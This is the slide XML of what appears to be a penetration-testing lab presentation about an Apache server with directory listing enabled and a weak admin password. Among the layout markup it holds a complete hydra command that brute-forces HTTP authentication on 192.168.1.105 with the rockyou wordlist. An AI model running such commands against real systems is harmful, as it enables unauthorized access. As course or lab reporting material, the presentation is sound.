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37"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="296" r:id="rId3"/>
    <p:sldId id="280" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="297" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="278" r:id="rId14"/>
    <p:sldId id="290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91" r:id="rId28"/>
    <p:sldId id="292" r:id="rId29"/>
    <p:sldId id="293" r:id="rId30"/>
    <p:sldId id="285" r:id="rId31"/>
    <p:sldId id="286" r:id="rId32"/>
    <p:sldId id="294" r:id="rId33"/>
    <p:sldId id="295" r:id="rId34"/>
    <p:sldId id="298" r:id="rId35"/>
    <p:sldId id="277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Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
      <p:italic r:id="rId48"/>
      <p:boldItalic r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId50"/>
      <p:bold r:id="rId51"/>
      <p:italic r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin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C2846D-6DAD-4640-8CFD-54061075D8CE}">
  <a:tblStyle styleId="{22C2846D-6DAD-4640-8CFD-54061075D8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214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592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708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0129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858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07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3862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230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806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5487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Exploitation: Directory Listing Enabled on Apache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091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AU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575140" y="14805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640045E-940F-497B-AC84-2FB832041EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="274320" y="574675"/>
            <a:ext cx="8595360" cy="4059433"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8595600" cy="4060229"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Shape 253">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{756ED4B4-8D68-4A77-BF82-CA20BAAA03FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8595600" cy="10200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="8595600" h="10200">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8595600" y="10200"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/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Shape 260">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED9A71F-2E2B-4846-83ED-894613F82C73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="360439" y="906029"/>
              <a:ext cx="2428541" cy="3154200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="2428541" h="3154200">
                  <a:moveTo>
                    <a:pt x="20" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2023762" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2247304" y="0"/>
                    <a:pt x="2428520" y="181216"/>
                    <a:pt x="2428520" y="404758"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2428541" y="3154180"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2428541" y="3154191"/>
                    <a:pt x="2428531" y="3154200"/>
                    <a:pt x="2428520" y="3154200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="404778" y="3154200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181237" y="3154200"/>
                    <a:pt x="20" y="2972983"/>
                    <a:pt x="20" y="2749442"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="20"/>
                  </a:ln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0" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F3F3F3"/>
            </a:solidFill>
            <a:ln w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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6C54446-A10F-4D50-9AC1-31FE11DD18C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1026436"/>
              <a:ext cx="1678290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Tools</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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Processes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FE8E38D-252E-4D60-9FF5-3007B984ECAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1235987"/>
              <a:ext cx="2466357" cy="2375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Running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bash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command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to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EAEC4B2-9DD8-42CA-A7FC-56F9A9D8837D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1512211"/>
              <a:ext cx="973124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get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file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list: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3A14C16-7E66-4134-9186-F67D3083F78B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1788436"/>
              <a:ext cx="1713356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2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BDAFA1-42F4-4014-84E2-DC560FACF164}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2051700" y="2064662"/>
              <a:ext cx="600779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2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CE2BC35-7A44-4A60-B4D0-469DF0F3583E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2064662"/>
              <a:ext cx="1889698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CBC266D-69FA-4F34-80AF-EC71DD6A8A09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1606083" y="2340887"/>
              <a:ext cx="1017717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2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2B8DD2D-A074-4098-931D-C3EA455C0451}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2340887"/>
              <a:ext cx="1297026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3BE3E10-D10D-467C-B1C1-0759FAF79579}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2617111"/>
              <a:ext cx="1887671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2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7919E47-6A17-4AD8-85D3-2E7D265DA516}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1606083" y="2893337"/>
              <a:ext cx="285795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42C4822-DB43-4A61-97B7-3212711A43B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2893337"/>
              <a:ext cx="1297026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F442A3-ACB3-4C34-8715-458BDF357BBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1555246" y="3169561"/>
              <a:ext cx="213637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58E007A-CBA7-406D-B2B1-2D390219E92E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="3445786"/>
              <a:ext cx="2445074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2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42BF8A7-5737-4E62-B3C9-9DF85B62F9A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="3722011"/>
              <a:ext cx="1948073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5" name="Shape 274">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EF5A5EC-DDEF-40F1-ACAF-8A1714CDC650}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="182806" y="247823"/>
              <a:ext cx="533372" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533372" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533372" y="58367"/>
                    <a:pt x="533372" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533372" y="397165"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533372" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:ln w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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6B5FC92-DF22-4601-A25E-4F911430DC25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301687" y="332802"/>
              <a:ext cx="393020" cy="41567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01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7" name="Shape 276">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3C6430-65FE-4CB8-8810-A997F5EC27BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318969" y="636608"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144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 w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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Shape 277">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA3DD28-F53A-479C-B281-9A6C82CA4F78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2954582" y="247823"/>
              <a:ext cx="533372" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533372" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533372" y="58367"/>
                    <a:pt x="533372" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533372" y="397165"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533372" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:ln w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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2A10956-5930-4F7C-8463-EDE77DCCCBD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3073463" y="332802"/>
              <a:ext cx="393020" cy="41567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02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0" name="Shape 279">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71BD71E3-A5D6-4B02-BA3B-3BC9208CABC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3090745" y="636608"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144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 w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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EDAB85B-6985-4D7B-B45E-DBA1FAD50493}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1026437"/>
              <a:ext cx="1298445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Achievements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F1B55A5-4EC5-4A9C-B2E4-D755F4D1C9E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1235988"/>
              <a:ext cx="2484599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Created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file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containing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all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029997B-DCF5-4EE2-9181-27C9260FFF8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1445538"/>
              <a:ext cx="2587161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directories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and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file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locations.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8B91257-F7A0-4B2A-B74A-122580F4F575}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1864638"/>
              <a:ext cx="2520070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Reviewed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files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to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determine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D5904A1-26FB-400D-A30F-381430838F3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2074188"/>
              <a:ext cx="2569324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further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reconnaissance.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E.g.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8F8C562-BB39-4B11-9E7C-E235845F6BCE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2283738"/>
              <a:ext cx="2384266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meet_our_team/ashton.txt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E649128-762F-4FE6-AC9A-58164AE3A9E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2702838"/>
              <a:ext cx="2789447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Found</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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Ashton</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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is</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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the</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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admin</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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for</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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DD0C678-C1C1-4A7F-AABA-8021B4F57C3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2911978"/>
              <a:ext cx="2787201" cy="21773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/company_folders/secret_folder/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1100" b="1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3311070-B2DF-48B8-AC15-BC11677C9956}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5498843" y="2911978"/>
              <a:ext cx="46265" cy="21773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5038B41-080C-4016-8041-87597AC4D976}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="3102888"/>
              <a:ext cx="50065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1" name="Shape 294">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1DDD629-7EFD-453F-B454-10D2D317805A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5859707" y="248573"/>
              <a:ext cx="533371" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533371" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533371" y="58367"/>
                    <a:pt x="533371" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533371" y="397164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533371" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397164"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:ln w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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D9E036A-9199-423C-A4B9-95F54DEABAB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5978588" y="333552"/>
              <a:ext cx="393020" cy="41567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03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3" name="Shape 296">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68BFB752-67F7-43FD-A0C3-1731502E3F95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5995870" y="637358"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144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 w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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F3E06F01-2BB8-4E15-AAD9-A83EFC32CF42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825307" y="128020"/>
              <a:ext cx="1687922" cy="2643874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DDECFE96-C21A-4E92-A03B-134116CBA4DF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844399" y="2159845"/>
              <a:ext cx="1941375" cy="1834899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D9EDB21-8A42-4583-BE70-A4C3A76C649F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6069650" y="1026437"/>
              <a:ext cx="858807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Results...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39D4747C-C8F0-480C-BA47-D41EA4666D59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620966" y="2291445"/>
            <a:ext cx="23715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hydra –l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ashton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–P rockyou.txt –s 80 –f –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sV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192.168.1.105 http-get /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company_folders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/secret_folder </a:t>
            </a:r>
            <a:endParaRPr lang="en-A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Weak Password &amp; No Failed Password Lockout</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112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8" name="Google Shape;1118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9" name="Google Shape;1119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0" name="Google Shape;1120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1" name="Google Shape;1121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3" name="Google Shape;1123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4" name="Google Shape;1124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5" name="Google Shape;1125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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362180" y="1481325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98D15F-1FCB-4813-A002-5BB114322CF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="273322" y="635771"/>
            <a:ext cx="8662671" cy="4178808"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8663251" cy="4178808"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Shape 316">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2575A318-C5D3-4139-8502-0997673967F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8595600" cy="10200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="8595600" h="10200">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8595600" y="10200"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/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5631BC4-D917-4782-8BD2-424E6E6788EA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630951" y="879783"/>
              <a:ext cx="2032300" cy="1820475"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Shape 326">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E72B5F27-5D72-4C68-A7C5-D334A5917001}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449880" y="840495"/>
              <a:ext cx="2428541" cy="3154200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="2428541" h="3154200">
                  <a:moveTo>
                    <a:pt x="20" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2023762" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2247304" y="0"/>
                    <a:pt x="2428520" y="181216"/>
                    <a:pt x="2428520" y="404758"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2428541" y="3154180"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2428541" y="3154191"/>
                    <a:pt x="2428531" y="3154200"/>
                    <a:pt x="2428520" y="3154200"/>
